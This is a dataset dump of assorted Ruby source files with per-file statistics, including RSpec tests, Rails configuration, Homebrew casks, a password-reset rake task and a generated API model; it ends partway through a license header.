hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
3851435aade570f2195bbad15a29c1991b7467ee | 80 | c
s tc:255:255:255:255:89:1:0:0:1:1:211
t 0:182:0:0:182:0
t 182:0:182:182:0:182
| 16 | 37 | 0.65 |
fff39c85723946744f864df8549936e86e88ffe5 | 4,886 | require_relative '../../controller/PostController'
describe PostController do
before :each do
@stub_client = double
@controller = PostController.new
@posts = Posts.new({ "id": 0, "post_text": 'saya #aku', "attachment": 'a.png', "user_id": 1, "hashtag": ['aku'] })
@arr = [Posts.new({ "id": 0, "post_text": 'saya #aku', "attachment": 'a.png', "user_id": 1, "hashtag": ['aku'] })]
@response = { 'id' => 1, 'post_text' => 'saya #aku', 'attachment' => 'a.png', 'user_id' => 1, 'date' => nil,
'hashtag' => ['aku'] }
@response_nofile = { 'id' => 1, 'post_text' => 'saya #aku', 'attachment' => nil, 'user_id' => 1, 'date' => nil,
'hashtag' => ['aku'] }
@posts_nofile = Posts.new({ "id": 0, "post_text": 'saya #aku', "attachment": nil, "user_id": 1,
"hashtag": ['aku'] })
@hash = ['aku']
end
describe 'get_post_by_hash' do
context 'when params hashtag valid' do
it 'return post' do
params = 'aku'
data =
{
'status' => 200,
'message' => 'Success',
'data' => @response
}
allow(Posts).to receive(:get_post_by_hashtag).with(params).and_return(data)
result = @controller.get_post_by_hash(params)
expect(result).to eq(data)
end
end
context 'when params hashtag not valid' do
it 'return status 404' do
params = nil
data =
{
'status' => 404,
'message' => 'Not found Post Based on hashtags name'
}
allow(Posts).to receive(:get_post_by_hashtag).with(params).and_return(data)
result = @controller.get_post_by_hash(params)
expect(result).to eq(data)
end
end
end
describe 'get_post_based_time' do
context 'when posts not nil' do
it 'return posts' do
allow(Posts).to receive(:get_post_by_time).and_return(@arr)
result = @controller.get_post_based_time
expect(result).to eq(@arr)
end
end
context 'when posts nil' do
it 'return false' do
allow(Posts).to receive(:get_post_by_time).and_return(false)
result = @controller.get_post_based_time
expect(result).to eq(false)
end
end
end
describe 'save' do
context 'when params is valid' do
it 'create posts and return 200' do
params =
{
'files' => 'a.png',
'text' => 'saya #aku',
'user_id' => 1
}
data =
{
'status' => 200,
'message' => 'Success',
'data' => @response
}
allow(Hashtags).to receive(:get_hashtag).with(params['text']).and_return(@hash)
allow(Posts).to receive(:new).and_return(@stub_client)
allow(@stub_client).to receive(:save).and_return(1)
allow(Posts).to receive(:get_post).with(1).and_return(@posts)
stub_hashtag = double
allow(Hashtags).to receive(:new).and_return(stub_hashtag)
allow(stub_hashtag).to receive(:save_hashtags)
allow(stub_hashtag).to receive(:save_postshashtag).with(1)
expected_result = @controller.save(params, 'a.png')
expect(expected_result).to eq(data)
end
end
context 'when params is not valid' do
it 'return status 500' do
params =
{
'files' => 'a.png',
'user_id' => 1
}
data =
{
'status' => 500,
'message' => 'Error'
}
allow(Hashtags).to receive(:get_hashtag).with(params['text']).and_return(@hash)
allow(Posts).to receive(:new).and_return(@stub_client)
allow(@stub_client).to receive(:save).and_return(false)
expected_result = @controller.save(params, 'a.png')
expect(expected_result).to eq(data)
end
end
context 'when attachment is nil' do
it 'return status 200' do
params =
{
'files' => nil,
'text' => 'saya #aku',
'user_id' => 1
}
data =
{
'status' => 200,
'message' => 'Success',
'data' => @response_nofile
}
allow(Hashtags).to receive(:get_hashtag).with(params['text']).and_return(@hash)
allow(Posts).to receive(:new).and_return(@stub_client)
allow(@stub_client).to receive(:save).and_return(1)
allow(Posts).to receive(:get_post).with(1).and_return(@posts_nofile)
stub_hashtag = double
allow(Hashtags).to receive(:new).and_return(stub_hashtag)
allow(stub_hashtag).to receive(:save_hashtags)
allow(stub_hashtag).to receive(:save_postshashtag).with(1)
expected_result = @controller.save(params, nil)
expect(expected_result).to eq(data)
end
end
end
end
| 32.357616 | 118 | 0.554237 |
d54facd196cd4bc01a298bc3edf80fbadb94bcc9 | 207 | module Querkle
module ControllerExtensions
def authorize!(*args)
current_role.authorize!(*args)
end
def current_role
@current_role ||= Role.compile(current_user)
end
end
end
| 17.25 | 50 | 0.68599 |
6ab23621f83f8af1a31bc68acf0dbe33982ada73 | 919 | module ArticleJSON
module Export
module AMP
module Elements
class Base
include ArticleJSON::Export::Common::HTML::Elements::Base
# List of custom element tags used by this element
# @return [Array[Symbol]]
def custom_element_tags
[]
end
class << self
# Return the module namespace this class and its subclasses are
# nested in
# @return [Module]
def namespace
ArticleJSON::Export::AMP::Elements
end
private
# The format this exporter is returning. This is used to determine
# which custom element exporters should be applied from the
# configuration.
# @return [Symbol]
def export_format
:amp
end
end
end
end
end
end
end
| 24.837838 | 78 | 0.529924 |
e81baf644afd9b3f088c15850416bdf392d3bf8a | 455 | Rails.application.assets.logger = Logger.new(RUBY_PLATFORM =~ /(win|w)32$/ ? "NUL" : "/dev/null")
Rails::Rack::Logger.class_eval do
def call_with_quiet_assets(env)
previous_level = Rails.logger.level
Rails.logger.level = Logger::ERROR if env['PATH_INFO'].index("/assets/") == 0
call_without_quiet_assets(env).tap do
Rails.logger.level = previous_level
end
end
alias_method_chain :call, :quiet_assets
end
| 35 | 99 | 0.681319 |
01075be9a5615c183439043b8bc4cfd99325fde4 | 5,009 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress CSS using a preprocessor.
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "codeblue_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 44.327434 | 114 | 0.762228 |
18384c223045901e64fe88fa231653d4126c67b5 | 632 | require_dependency 'core/application_record'
module Core
module Regularization
class SolicitationAnswer < ApplicationRecord # :nodoc:
self.table_name = 'extranet.regularization_solicitation_answers'
belongs_to :solicitation, required: false, class_name: 'Core::Regularization::Solicitation'
belongs_to :request, required: false, class_name: 'Core::Regularization::SolicitationRequest', foreign_key: :request_id
has_many :solicitation_documents
validates :answer, presence: true
def self.model_name
ActiveModel::Name.new(self, nil, 'SolicitationAnswer')
end
end
end
end
| 37.176471 | 125 | 0.75 |
ab9660e55cb3d1d5ff23d406c96d3c5fef8dd4bc | 74 | class GopayPayment < ApplicationRecord
include Gopay::Mixins::Model
end
| 18.5 | 38 | 0.810811 |
7a0234a17e270093dc572aad9980252a7a534511 | 2,008 | # frozen_string_literal: true
require 'io/console'
namespace :password do
namespace :master do
desc 'Reset password for a master user'
task(:reset, %i[email_or_username password] => [:environment]) do |_task, args|
def say(message, icon = :info)
puts "[#{emoji(icon)}] " + message.to_s
end
def emoji(icon)
case icon
when :question
"\e[34m?\e[0m"
when :info
"\e[36m\xE2\x84\xB9\e[0m"
when :ok
"\e[32m\xE2\x9C\x94\e[0m"
when :fail
"\e[32m\xE2\x9C\x96 \e[0m"
else
"....."
end
end
say "You are about to change the password of a user of Master tenant"
email = args.email_or_username
password = args.password
password_confirmation = args.password
if email.blank?
say "Please give the email or username of the user", :question
email = STDIN.gets
email.chomp!
end
user = Account.master.users.where.has { |t| (t.email == email) | (t.username == email) }.first
unless user
say "Can't find User `#{email}`", :fail
exit 1
end
if password.blank?
loop do
say "Please enter the NEW password", :question
password = STDIN.noecho(&:gets).chomp
break if password.present?
end
loop do
say "Please confirm the password", :question
password_confirmation = STDIN.noecho(&:gets).chomp
break if password_confirmation.present?
end
if password != password_confirmation
say "Password and confirmation does not match", :fail
exit 1
end
end
user.password = user.password_confirmation = password
if user.save
say "`#{email}` password has been changed successfully", :ok
else
say "Error in saving #{email} password"
say user.errors.full_messages.join("\n"), :info
exit 1
end
end
end
end
| 27.135135 | 100 | 0.574203 |
ab6ee345545494926421110f1219feb9672db364 | 5,163 | =begin
#Selling Partner API for Merchant Fulfillment
#The Selling Partner API for Merchant Fulfillment helps you build applications that let sellers purchase shipping for non-Prime and Prime orders using Amazon’s Buy Shipping Services.
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.26
=end
require 'date'
module AmzSpApi::MerchantFulfillmentApiModel
# The phone number.
class PhoneNumber
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
}
end
# Attribute type mapping.
def self.swagger_types
{
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = AmzSpApi::MerchantFulfillmentApiModel.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.169492 | 182 | 0.629866 |
6144446aafa44654e83b19c52673e4d96c103d7b | 5,535 | describe PglogicalSubscription do
let(:subscriptions) do
[
{
"subscription_name" => "subscription_example_com",
"status" => "replicating",
"provider_node" => "region_0",
"provider_dsn" => "dbname = 'vmdb\\'s_test' host='example.com' user='root' port='' password='p=as\\' s\\''",
"slot_name" => "pgl_vmdb_test_region_0_subscripdb71d61",
"replication_sets" => ["miq"],
"forward_origins" => ["all"]
},
{
"subscription_name" => "subscription_test_example_com",
"status" => "disabled",
"provider_node" => "region_1",
"provider_dsn" => "dbname = vmdb_test2 host=test.example.com user = postgres port=5432 fallback_application_name='bin/rails'",
"slot_name" => "pgl_vmdb_test_region_1_subscripdb71d61",
"replication_sets" => ["miq"],
"forward_origins" => ["all"]
}
]
end
let(:expected_attrs) do
[
{
"id" => "subscription_example_com",
"status" => "replicating",
"dbname" => "vmdb's_test",
"host" => "example.com",
"user" => "root",
"provider_region" => 0,
"provider_region_name" => "The region"
},
{
"id" => "subscription_test_example_com",
"status" => "disabled",
"dbname" => "vmdb_test2",
"host" => "test.example.com",
"user" => "postgres",
"port" => 5432,
"provider_region" => 1
}
]
end
let(:pglogical) { double }
before do
FactoryGirl.create(:miq_region, :region => 0, :description => "The region")
allow(described_class).to receive(:pglogical).and_return(pglogical)
end
describe ".find" do
context "with records" do
before do
allow(pglogical).to receive(:subscriptions).and_return(subscriptions)
allow(pglogical).to receive(:enabled?).and_return(true)
end
it "retrieves all the records with :all" do
actual_attrs = described_class.find(:all).map(&:attributes)
expect(actual_attrs).to match_array(expected_attrs)
end
it "retrieves the first record with :first" do
rec = described_class.find(:first)
expect(rec.attributes).to eq(expected_attrs.first)
end
it "retrieves the last record with :last" do
rec = described_class.find(:last)
expect(rec.attributes).to eq(expected_attrs.last)
end
end
context "with no records" do
before do
allow(pglogical).to receive(:subscriptions).and_return([])
allow(pglogical).to receive(:enabled?).and_return(true)
end
it "returns an empty array with :all" do
expect(described_class.find(:all)).to be_empty
end
it "returns nil with :first" do
expect(described_class.find(:first)).to be_nil
end
it "returns nil with :last" do
expect(described_class.find(:last)).to be_nil
end
end
context "with pglogical disabled" do
before do
allow(pglogical).to receive(:enabled?).and_return(false)
end
it "returns an empty array with :all" do
expect(described_class.find(:all)).to be_empty
end
it "returns nil with :first" do
expect(described_class.find(:first)).to be_nil
end
it "returns nil with :last" do
expect(described_class.find(:last)).to be_nil
end
end
end
describe "#save!" do
it "creates the node when there are no subscriptions" do
allow(pglogical).to receive(:subscriptions).and_return([])
allow(pglogical).to receive(:enabled?).and_return(true)
# node created
expect(pglogical).to receive(:enable)
expect(pglogical).to receive(:node_create).and_return(double(:check => nil))
# subscription is created
expect(pglogical).to receive(:subscription_create) do |name, dsn, replication_sets, sync_structure|
expect(name).to eq("subscription_test_2_example_com")
expect(dsn).to include("host='test-2.example.com'")
expect(dsn).to include("user='root'")
expect(replication_sets).to eq(['miq'])
expect(sync_structure).to be false
end.and_return(double(:check => nil))
described_class.new(:host => "test-2.example.com", :user => "root").save!
end
it "raises when an existing subscription is saved" do
allow(pglogical).to receive(:subscriptions).and_return(subscriptions)
allow(pglogical).to receive(:enabled?).and_return(true)
sub = described_class.find(:first)
sub.host = "other-host.example.com"
expect { sub.save! }.to raise_error("Cannot update an existing subscription")
end
end
describe "#delete" do
it "drops the node when this is the last subscription" do
allow(pglogical).to receive(:enabled?).and_return(true)
allow(pglogical).to receive(:subscriptions).and_return([subscriptions.first], [])
sub = described_class.find(:first)
expect(pglogical).to receive(:subscription_drop).with("subscription_example_com", true)
expect(MiqRegion).to receive(:destroy_region)
.with(instance_of(ActiveRecord::ConnectionAdapters::PostgreSQLAdapter), 0)
expect(pglogical).to receive(:node_drop).with("region_#{MiqRegion.my_region_number}", true)
sub.delete
end
end
end
| 33.75 | 139 | 0.609575 |
1a97850468dc2d7651290f3e1b4af2143589616a | 678 | cask "robo-3t" do
version "1.4.1,122dbd9"
sha256 "02cf60fd969e7c2f7037bb567f558e436618f9a707904f786d1f03f97193a263"
# download.studio3t.com was verified as official when first introduced to the cask
url "https://download.studio3t.com/robomongo/mac/robo3t-#{version.before_comma}-darwin-x86_64-#{version.after_comma}.dmg"
appcast "https://github.com/Studio3T/robomongo/releases.atom"
name "Robo 3T (formerly Robomongo)"
desc "MongoDB management tool (formerly Robomongo)"
homepage "https://robomongo.org/"
app "Robo 3T.app"
uninstall quit: "Robo 3T"
zap trash: [
"~/.3T/robo-3t/",
"~/Library/Saved Application State/Robo 3T.savedState",
]
end
| 32.285714 | 123 | 0.740413 |
e847aadb99656a3ec95154a31e00755a0357151a | 2,141 | # Include this file into your view layer. For example, in Rails:
#
# module ApplicationHelper
# include Microformats::Helpers
# end
#
module Microformats::Helpers
# Creates a vCard with the given options and a block.
#
# OPTIONS:
# * :tag - The HTML wrapper element (defaults to :div)
# * Any other passed options will be treated as HTML attributes.
#
# EXAMPLE:
# <% vcard :id => 'my_vcard' do |card| %>
# Hello, my name is <%= card.name "Chris" %>!
# <% end %>
#
def vcard(opts = {}, &block)
card = Microformats::Vcard.new(self)
card.run(opts, &block)
end
# Creates a vAddress with the given options and a block.
#
# OPTIONS:
# * :type - A string that specifies the type of address('home', 'work', etc)
# * :tag - The HTML wrapper element (defaults to :div)
# * Any other passed options will be treated as HTML attributes.
#
# EXAMPLE:
# <% vaddress :type => 'work', :id => 'my_adr' do |adr| %>
# I live at <%= adr.street "123 Main St" %>.
# <% end %>
#
def vaddress(opts = {}, &block)
address = Microformats::Address.new(self)
address.run(opts, &block)
end
# Creates a vEvent with the given options and a block.
#
# OPTIONS:
# * :tag - The HTML wrapper element (defaults to :div)
# * Any other passed options will be treated as HTML attributes.
#
# EXAMPLE:
# <% vevent :id => 'my_event' do |event| %>
# This event is called <%= event.name "Cool Event" %>.
# <% end %>
#
def vevent(opts = {}, &block)
event = Microformats::Event.new(self)
event.run(opts, &block)
end
# Creates a vCalendar with the given options and a block.
#
# OPTIONS:
# * :tag - The HTML wrapper element (defaults to :div)
# * Any other passed options will be treated as HTML attributes.
#
# EXAMPLE:
# <% vcalendar :id => 'my_cal' do |cal| %>
# <% cal.event :id => 'my_event' do |event| %>
# This event is called <%= event.name "Cool Event" %>.
# <% end %>
# <% end %>
#
def vcalendar(opts = {}, &block)
cal = Microformats::Calendar.new(self)
cal.run(opts, &block)
end
end | 28.932432 | 78 | 0.601121 |
1d7d91d97a5e17d2e9d9b132f34cd51388dabe16 | 540 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/take', __FILE__)
describe "Enumerable#first" do
it "returns the first element" do
EnumerableSpecs::Numerous.new.first.should == 2
EnumerableSpecs::Empty.new.first.should == nil
end
it "returns nil if self is empty" do
EnumerableSpecs::Empty.new.first.should == nil
end
describe "when passed an argument" do
it_behaves_like :enumerable_take, :first
end
end
| 28.421053 | 58 | 0.727778 |
624fb9de2eb4ec1617895c511c015fb9379fa30c | 1,104 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'aruba/rspec/version'
Gem::Specification.new do |spec|
spec.name = "aruba-rspec"
spec.version = Aruba::RSpec::VERSION
spec.authors = ["Eric Saxby"]
spec.email = %w([email protected])
spec.summary = %q{Bridge RSpec and Aruba to test command-line tools}
spec.description = %q{Aruba and ArubaDoubles help to test command-line tools, but they are build around Cucumber. This gem helps integrate with RSpec.}
spec.homepage = "https://github.com/livinginthepast/aruba-rspec"
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency 'rspec', '>= 3.0'
spec.add_dependency 'aruba'
spec.add_dependency 'aruba-doubles'
spec.add_development_dependency "bundler"
spec.add_development_dependency "rake"
end
| 40.888889 | 155 | 0.682971 |
6281368fadaad767da8dc20b856abd28da971cbc | 352 | require 'ruby2ruby'
module Reek
module Source
#
# Formats snippets of syntax tree back into Ruby source code.
#
class SexpFormatter
def self.format(sexp)
return sexp.to_s unless Array === sexp
sexp = Sexp.from_array(YAML::load(YAML::dump(sexp)))
Ruby2Ruby.new.process(sexp)
end
end
end
end
| 19.555556 | 65 | 0.636364 |
5d8dae1f462060f196970ce5cfec34c9335f8e73 | 423 | cask 'gisto' do
version '1.10.26'
sha256 'e63854a615f3e1a0f6a5d32b7fa83119da1861230fe01301e677e3d98775021b'
# github.com/Gisto/Gisto was verified as official when first introduced to the cask
url "https://github.com/Gisto/Gisto/releases/download/v#{version}/Gisto-#{version}.dmg"
appcast 'https://github.com/Gisto/Gisto/releases.atom'
name 'Gisto'
homepage 'https://www.gistoapp.com/'
app 'Gisto.app'
end
| 32.538462 | 89 | 0.756501 |
081f3d63dfc366f9bca421fc24459830e76a4caa | 1,780 | # -*- coding: utf-8 -*-
module Kindai
class SpreadDownloader
attr_accessor :spread
attr_accessor :retry_count
attr_accessor :book_path
def self.new_from_spread(spread)
raise TypeError, "#{spread} is not Kindai::Spread" unless spread.is_a? Kindai::Spread
me = self.new
me.spread = spread
me.retry_count = 30
me.book_path = Pathname.new(ENV["HOME"]).to_s
me
end
def download
return false if self.has_file?
self.create_directory
self.download_spread
return true
end
def create_directory
path = File.join self.book_path, "original"
Dir.mkdir(path) unless File.directory?(path)
end
def spread_path
path = File.join self.book_path, "original", "%03d.jpg" % self.spread.spread_number
File.expand_path path
end
def delete
return File.delete(self.spread_path) && true rescue false
end
def has_file?
File.size? self.spread_path
end
protected
def download_spread
failed_count = 0
begin
Kindai::Util.logger.info "downloading " + [self.spread.book.author, self.spread.book.title, "spread #{self.spread.spread_number} / #{self.spread.book.total_spread}"].join(' - ')
Kindai::Util.rich_download(spread.image_uri, self.spread_path)
rescue Interrupt => err
Kindai::Util.logger.error "#{err.class}: #{err.message}"
exit 1
rescue StandardError, TimeoutError => err
Kindai::Util.logger.warn "failed (#{failed_count+1}/#{self.retry_count}) #{err.class}: #{err.message}"
raise err if failed_count == self.retry_count
Kindai::Util.logger.info "sleep and retry"
failed_count += 1
sleep 20
retry
end
end
end
end
| 26.969697 | 185 | 0.646067 |
39642cdfe17cd24e7faf7c5e08813cc869c125c3 | 314 | class AddCommitAccessPermission < ActiveRecord::Migration
def self.up
Role.all.select { |r| not r.builtin? }.each do |r|
r.add_permission!(:commit_access)
end
end
def self.down
Role.all.select { |r| not r.builtin? }.each do |r|
r.remove_permission!(:commit_access)
end
end
end
| 22.428571 | 57 | 0.665605 |
6ab50b30dee68153a185e40cfc2c5cfc6e518b54 | 4,856 | require 'spec_helper'
describe 'ZabbixApi::Templates' do
let(:templates_mock) { ZabbixApi::Templates.new(client) }
let(:client) { double }
describe '.method_name' do
subject { templates_mock.method_name }
it { is_expected.to eq 'template' }
end
describe '.identify' do
subject { templates_mock.identify }
it { is_expected.to eq 'host' }
end
describe '.delete' do
subject { templates_mock.delete(data) }
let(:data) { { testidentify: 222 } }
let(:result) { { 'templateids' => ['1'] } }
let(:identify) { 'testidentify' }
let(:method_name) { 'testmethod' }
before do
allow(templates_mock).to receive(:log)
allow(templates_mock).to receive(:identify).and_return(identify)
allow(templates_mock).to receive(:method_name).and_return(method_name)
allow(client).to receive(:api_request).with(
method: 'template.delete',
params: [data]
).and_return(result)
end
context 'when result is not empty' do
it 'returns the id of first template' do
expect(subject).to eq 1
end
end
context 'when result is empty' do
let(:result) { [] }
it { is_expected.to be_nil }
end
end
describe '.get_ids_by_host' do
subject { templates_mock.get_ids_by_host(data) }
let(:data) { { scriptid: 222, hostid: 333 } }
let(:result) { [{ 'templateid' => 1 }, { 'templateid' => 2 }] }
let(:ids) { [1, 2] }
before do
allow(client).to receive(:api_request).with(
method: 'template.get',
params: data
).and_return(result)
end
it { is_expected.to eq ids }
end
describe '.get_or_create' do
subject { templates_mock.get_or_create(data) }
let(:data) { { host: 1234 } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(templates_mock).to receive(:get_id).with(host: data[:host]).and_return(id)
allow(templates_mock).to receive(:create).with(data).and_return(id_through_create)
end
context 'when ID already exist' do
let(:id) { '111' }
it 'returns the existing ID' do
expect(subject).to eq id
end
end
context 'when id does not exist' do
it 'returns the newly created ID' do
expect(subject).to eq id_through_create
end
end
end
describe '.mass_update' do
subject { templates_mock.mass_update(data) }
let(:data) { { hosts_id: [1234, 5678], templates_id: [1111, 2222] } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(client).to receive(:api_request).with(
method: 'template.massUpdate',
params: {
hosts: [{ hostid: 1234 }, { hostid: 5678 }],
templates: [{ templateid: 1111 }, { templateid: 2222 }]
}
).and_return(result)
end
context 'when api_request returns empty result' do
let(:result) { [] }
it { is_expected.to be_falsy }
end
context 'when api_request doesn not return empty result' do
it { is_expected.to be_truthy }
end
end
describe '.mass_add' do
subject { templates_mock.mass_add(data) }
let(:data) { { hosts_id: [1234, 5678], templates_id: [1111, 2222] } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(client).to receive(:api_request).with(
method: 'template.massAdd',
params: {
hosts: [{ hostid: 1234 }, { hostid: 5678 }],
templates: [{ templateid: 1111 }, { templateid: 2222 }]
}
).and_return(result)
end
context 'when api_request returns empty result' do
let(:result) { [] }
it { is_expected.to be_falsy }
end
context 'when api_request doesn not return empty result' do
it { is_expected.to be_truthy }
end
end
describe '.mass_remove' do
subject { templates_mock.mass_remove(data) }
let(:data) { { hosts_id: [1234, 5678], templates_id: [1111, 2222], group_id: 4545 } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(client).to receive(:api_request).with(
method: 'template.massRemove',
params: {
hostids: data[:hosts_id],
templateids: data[:templates_id],
groupids: data[:group_id],
force: 1
}
).and_return(result)
end
context 'when api_request returns empty result' do
let(:result) { [] }
it { is_expected.to be_falsy }
end
context 'when api_request doesn not return empty result' do
it { is_expected.to be_truthy }
end
end
end
| 26.391304 | 89 | 0.600906 |
ed0c47ec2b3fab2f1c9f4379faf99c9497a5bd2d | 235 | describe file('/boot/cmdline.txt') do
it { should be_file }
it { should be_mode 755 }
it { should be_owned_by 'root' }
its(:content) { should match /console=tty1/ }
its(:content) { should match /console=ttyAMA0,115200/ }
end
| 29.375 | 57 | 0.680851 |
ed8f34e52f223b43e0d4dcc7aefad768c378a3e1 | 44 | module Adyen
VERSION = '0.1.8'.freeze
end
| 11 | 26 | 0.681818 |
bfe08b02ad16c24d9bc69eb13e94bb64d8c9872e | 680 | # Copyright 2017, Google Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
